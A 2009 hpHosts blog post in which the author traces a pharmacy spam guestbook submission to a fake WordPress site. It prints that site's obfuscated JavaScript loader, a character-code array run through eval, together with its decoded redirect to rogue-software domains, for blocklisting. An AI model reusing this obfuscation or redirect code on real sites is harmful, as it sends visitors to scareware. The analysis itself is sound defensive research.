Blog for hpHosts, and whatever else I feel like writing about ....

Monday, 22 June 2009

On the subject of blog spam ......

.... though technically not blog spam, one of the sites I look after, had the following submitted to the guestbook (good thing I wrote a filter for it huh?) a few minutes ago;

*********************************************************************
General
*********************************************************************
Reason for message: BLACKLISTED USER guestbook submission notification
Server address: [REMOVED]
Referring page: [REMOVED]
Date submitted: 23 June 2009
Time submitted: 02:08:04
Submitted by: Helen < helta3443@gmail.com >
Posters IP: 66.114.134.154
*********************************************************************
Details
*********************************************************************
Name: Helen
E-mail: helta3443@gmail.com
Private?: False
Comments:

that bring bloodthe blood are open.
<a href=www.youtube.comorderviagraonline1>order viagra here<a>state the penis isarteries going toblood can enter the[url=www.youtube.comorderviagraonline1]order viagra online[url]then gets trapped inelongates and


Incase you're wondering, our dear spammer is apparently coming from pioneernet.net (apparently a US based ISP - never heard of them myself).

You're probably wondering;

1. Why I am writing about this
2. Why I didn't have it block anything with A HREF or BBCode

Well, to answer #1, I thought it was funny, especially given this particular spam doesn't lead to a YouTube video, which I was actually expecting - but leads to a profile that links to pharmacy-elite.com (IP: 195.95.155.21), registered to Nexton Limited in the Ukraine, and hosted by MoskvaCom Ltd in Russia (AS2118), who also host canadianhealthcare.eu (IP: 195.95.155.3).

Our dear spammer however, is also known for something a little worse than meds spam - rogue crapware. Looking at ProjectHoneyPot shows references to a fake WordPress blog (I say fake because I've got a few other sites listed that are hosted on the same IP block) at softwarestory.com. Looking at the source code, shows a reference to a .JS file;

vURL Online - softwarestory.com/wp-admin/games/oufff.js
http://vurl.mysteryfcm.co.uk/?url=689094

This returns some rather interesting code;

var str=["336", "333", "332", "332", "332", "441", "420", "437", "355", "435", "434", "441", "384", "371", "382", "336", "333", "332", "332", "332", "425","440", "433", "422", "439", "428", "434", "433", "355", "434", "420", "420", "442", "426", "424", "434", "440", "437", "444", "444", "441", "440", "363","436", "440", "424", "437", "444", "364", "446", "336", "333", "332", "332", "332", "332", "442", "428", "433", "423", "434", "442", "369", "431", "434", "422", "420", "439", "428", "434", "433", "384", "362", "427", "439", "439", "435", "381", "370", "370", "434", "433", "431", "428", "433", "424", "425", "440", "437", "433", "428", "439", "440", "437", "424", "375", "440", "369", "428", "433", "425", "434", "370", "438", "440", "439", "437", "420", "370", "428", "433", "369", "422", "426", "428", "386", "373", "371", "361", "435", "420", "437", "420", "432", "424", "439", "424", "437", "384", "362", "355", "366", "355", "436", "440", "424", "437", "444", "355", "366", "355", "362", "361", "440", "437", "384", "372", "361", "395", "407", "407", "403", "418", "405", "392", "393", "392", "405", "392", "405", "384", "438", "434", "425", "439", "442", "420", "437", "424", "438", "439", "434", "437", "444", "418", "426","420", "432", "424", "438", "362", "382", "336", "333", "332", "332", "332", "448"];

var temp='';
var gg='';
for (i=0; i<str.length; i++){
gg=str[i]-323;
temp=temp+String.fromCharCode(gg);
}
eval(temp);


If we decode this, we see;

var pov=0;
function oaawgeouryyvu(query){
window.location='http://onlinefurniture4u.info/sutra/in.cgi?20¶meter=' + query + '&ur=1&HTTP_REFERER=softwarestory_games';
}


If we remove ' + query + ', we see it redirects us to;

stabilityinternettools.com/index.php?affid=01000

To answer #2, I don't get anywhere near as many infected or spammy e-mails as I used to, so I've got to try and keep some of my fun.

References:

Spambot Search Tool - 66.114.134.154 / helta3443@gmail.com
http://forum.hosts-file.net/sbst/index.php?name=&email=helta3443@gmail.com&ip=66.114.134.154

hpHosts - onlinefurniture4u.info
http://hosts-file.net/?s=onlinefurniture4u.info

hpHosts - stabilityinternettools.com
http://hosts-file.net/?s=stabilityinternettools.com

No comments: